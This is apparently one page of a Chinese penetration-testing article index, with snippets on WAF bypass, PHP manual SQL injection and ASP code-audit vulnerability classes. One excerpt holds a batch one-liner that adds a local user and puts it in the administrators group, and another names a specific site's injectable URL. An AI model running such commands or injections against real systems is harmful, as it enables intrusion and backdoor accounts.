秒杀服务器安全狗—添加用户

秒杀服务器安全狗—添加用户 刚刚看到试了下真加了用户 for /l %%i in (1,1,1000) do @net user unhonker test /add&@net localgroup admin...

WAF绕过方法从简单到高级

WAF介绍 什么是WAF? Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 基本/简单绕过方法: 1、注释...

详细步骤php手工注入拿后台——新鲜热乎的实例

注入点http://ykeast.com/cp.php?sid=-3 我们看,返回正常 然后and 1=2看一下(其实这里只要等号前后的数值不同就可以,and=且 如果网站过滤and ...

php+mysql快速渗透技巧

1)如何快速寻找站点注入漏洞? 2)PHP+MYSQL数据库下快速寻找WEB站点路径? 3)MYSQL LOAD FILE()下读取文件? 3)MYSQL INTO OUTFILE下写入PHPS...

ASP代码审计之SQL注入漏洞分析

SQL注入漏洞分析   概述:目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述: (1) 脚本注入式的攻击 (2) 恶意用户输入...

ASP代码审计之XML中的XPATH注入漏洞分析

XML中的XPATH注入漏洞分析   概述:Xml文档存储数据时,若查询数据不经过安全过滤也会和关系型数据库一样,产生注入漏洞,在这里我们总结成XP...

ASP代码审计之代码执行漏洞分析

代码执行漏洞分析   概述:许多现代编程语言都允许动态解析源代码指令。 如果程序员需要由用户提供的指令对数据操作,这种情况下可以应用这种...

ASP代码审计之Http请求伪造漏洞分析

Http请求伪造漏洞分析   概述:一个比欺骗表单更高级和复杂的攻击方式是HTTP请求欺骗。这给了攻击者完全的控制权与灵活性,它进一步证明了不...

ASP代码审计之JS本地验证漏洞分析

JS本地验证漏洞分析   概述:表单提交是当前Web应用中的重要内容,用户可以通过这种方式与服务器进行数据传递。在通常情况下,会在提交表单之...

ASP代码审计之目录遍历漏洞分析

目录遍历漏洞分析   概述:用户输入控制 file system 操作所用的路径,借此攻击者可以访问或修改其他受保护的系统资源。 漏洞原理:当满足以...

上一页 1 ...4 5 6 7 8 9 10 ... 22 下一页 共 22 页
Top